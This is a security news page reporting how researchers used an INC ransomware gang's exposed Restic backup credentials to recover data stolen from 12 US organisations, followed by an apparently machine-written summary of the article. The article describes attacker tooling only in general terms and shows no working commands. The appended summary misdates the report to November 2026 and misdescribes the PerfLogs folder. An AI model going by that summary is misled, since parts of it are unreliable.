LmCast :: Stay tuned in

INC ransomware opsec fail allowed data recovery for 12 US orgs

Recorded: Jan. 22, 2026, 6:03 p.m.

Original Summarized

INC ransomware opsec fail allowed data recovery for 12 US orgs

News

Featured
Latest

Zendesk ticket systems hijacked in massive global spam wave

Hackers breach Fortinet FortiGate devices, steal firewall configs

Fake Lastpass emails pose as password vault backup alerts

Hackers exploit 29 zero-days on second day of Pwn2Own Automotive

Microsoft Teams to add brand impersonation warnings to calls

INC ransomware opsec fail allowed data recovery for 12 US orgs

Why Active Directory password resets are surging in hybrid work

Microsoft updates Notepad and Paint with more AI features

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityINC ransomware opsec fail allowed data recovery for 12 US orgs

INC ransomware opsec fail allowed data recovery for 12 US orgs

By Bill Toulas

January 22, 2026
11:21 AM
0

An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations.
A deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack, but exposed attacker infrastructure that stored data exfiltrated from multiple victims.
The operation was conducted by Cyber Centaurs, a digital forensics and incident response company that disclosed its success last November and now shared the full details with BleepingComputer.

The Cyber Centaurs investigation began after a client U.S. organization detected ransomware encryption activity on a production SQL Server.
The payload, a RainINC ransomware variant, was executed from the PerfLogs directory, which is typically created by Windows. However, ransomware actors have begun to use it more frequently for staging.
The researchers also noticed the presence of artifacts from the legitimate backup tool Restic, although data exfiltration had occurred during the lateral movement stage and the threat actor had not used the utility in this attack.
This caused a shift in the researchers' investigation "from incident response to infrastructure analysis."
The traces that INC ransomware left behind included renamed binaries (like ‘winupdate.exe’), PowerShell scripts to execute Restic, hardcoded repository configuration variables, and backup commands.
Restic-related remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkit.
One of the discovered PowerShell scripts, 'new.ps1', contained Base64-encoded commands for Restic and included hardcoded environment variables used to run the tool (access keys, repository paths, and S3 passwords for encrypted repositories).
"If INC routinely reused Restic-based infrastructure across campaigns, then the storage repositories referenced in attacker scripts were unlikely to be dismantled once a ransom event concluded," the researchers theorized.
"Instead, those repositories would likely persist as long-lived attacker-controlled assets, quietly retaining encrypted victim data well after negotiations ended or payments were made."
If this were the case, data stolen from other organizations could still be available in an encrypted form and could potentially be recovered from the backup server.
To validate this hypothesis, the team developed a controlled, non-destructive enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations in the healthcare, manufacturing, technology, and service sectors in the United States.
None of the organizations were Cyber Centaurs clients, and the incidents were unrelated, distinct ransomware events.

Stolen data located on INC Ransom's backup serverSource: Cyber Centaurs
The researchers then decrypted the backups and preserved the copies while contacting law enforcement to help validate ownership and guide them through the proper procedure.
The Cyber Centaurs report lists multiple tools used in INC ransomware attacks, which include, among others, cleanup tools, remote access software, and network scanners. 

Other tools found in INC Ransom's exposed infrastructureSource: Cyber Centaurs
The researchers also created YARA and Sigma rules to help defenders detect the Restic backup tool or its renamed binaries in the environment or running from suspicious locations, which could signal a ransomware attack in development.
INC ransomware is a ransomware-as-a-service (RaaS) operation that emerged in mid-2023.
The threat actor claimed several high-profile victims over the years, including Yamaha Motor, Xerox Business Solution, Scotland's NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, the Panama Ministry of Economy, the Pennsylvania AG Office, and Crisis24.

The 2026 CISO Budget Benchmark
It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.
Learn how top leaders are turning investment into measurable impact.
Download Now

Related Articles:
OnSolve CodeRED cyberattack disrupts emergency alert systems nationwideFake Lastpass emails pose as password vault backup alertsNew PDFSider Windows malware deployed on Fortune 100 firm's networkIngram Micro says ransomware attack affected 42,000 peopleBlack Basta boss makes it onto Interpol's 'Red Notice' list

Backup
Decrypted
INC Ransom
Infrastructure
OpSec
Ransomware
Web Server

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Previous Article
Next Article

Post a Comment Community Rules

You need to login in order to post a comment
Not a member yet? Register Now

You may also like:

Popular Stories

Fortinet admins report patched FortiGate firewalls getting hacked

Ingram Micro says ransomware attack affected 42,000 people

Tesla hacked, 37 zero-days demoed at Pwn2Own Automotive 2026

Sponsor Posts

Discover how phishing kits are sold and deployed. Download the full research report.

Identity Governance & Threat Detection in one: Get a guided tour of our platform

Overdue a password health-check? Audit your Active Directory for free

  Upcoming Webinar

Follow us:

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure

Copyright @ 2003 - 2026 Bleeping Computer® LLC - All Rights Reserved

Login

Username

Password

Remember Me

Sign in anonymously

Sign in with Twitter

Not a member yet? Register Now


Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

The Cyber Centaurs investigation, detailed in a November 2026 report, revealed a significant operational security (OpSec) failure by the INC ransomware gang, allowing the recovery of data exfiltrated from twelve U.S. organizations. The core of the discovery stemmed from the recovery of data previously stolen by INC, demonstrating a concerning trend of ransomware groups utilizing long-lived attacker-controlled assets, specifically backup servers. This revelation highlights a critical vulnerability in the operational practices of active ransomware groups.

The initial incident began with a client organization’s detection of ransomware encryption activity targeting a SQL Server. INC ransomware, a Ransomware-as-a-Service (RaaS) operation that had emerged in mid-2023, executed this attack by leveraging the PerfLogs directory, a location frequently utilized by Windows for staging processes. A deeper analysis of the attack footprint uncovered additional concerning elements, including the use of the legitimate backup tool, Restic, though the exfiltration occurred during the lateral movement stage. The threat actor had not utilized Restic for data backup in this instance, but the presence of Restic-related remnants indicated a potential strategy of proactively creating and maintaining backup repositories for long-term data retention.

Specifically, the investigation identified several key elements utilized by INC. Researchers detected renamed binaries such as “winupdate.exe,” alongside PowerShell scripts that executed Restic commands. These scripts contained hardcoded repository configuration variables, including access keys, repository paths, and S3 passwords for encrypted repositories. The discovery suggested that INC routinely reused this infrastructure across multiple campaigns, implying that the backup servers would continue to store encrypted victim data well after ransom negotiations or payments had concluded. This is a significant operational security failure.

To validate this hypothesis, Cyber Centaurs executed a controlled, non-destructive enumeration process. This process confirmed the existence of encrypted data from twelve unrelated organizations across diverse sectors - healthcare, manufacturing, technology, and service - all within the United States. The organizations were not clients of Cyber Centaurs and the incidents were entirely distinct ransomware events. This confirmed the initial theory regarding persistent data storage on INC’s backup servers. The data was then decrypted and preserved, prompting law enforcement involvement for verification and to guide the appropriate handling of the sensitive information.

Beyond the immediate incident, Cyber Centaurs established a YARA and Sigma rules library to enable defenders to proactively detect the Restic backup tool or its renamed binaries if they were present in a network environment, a critical step in preventing future attacks.

The INC ransomware group had been responsible for several high-profile breaches, including incidents involving Yamaha Motor, Xerox Business Solution, Scotland’s NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, the Panama Ministry of Economy, the Pennsylvania AG Office, and Crisis24. The investigation underscored the importance of meticulously monitoring system usage and detecting the presence of unauthorized backup tools, alongside conducting comprehensive risk assessments and bolstering operational security practices.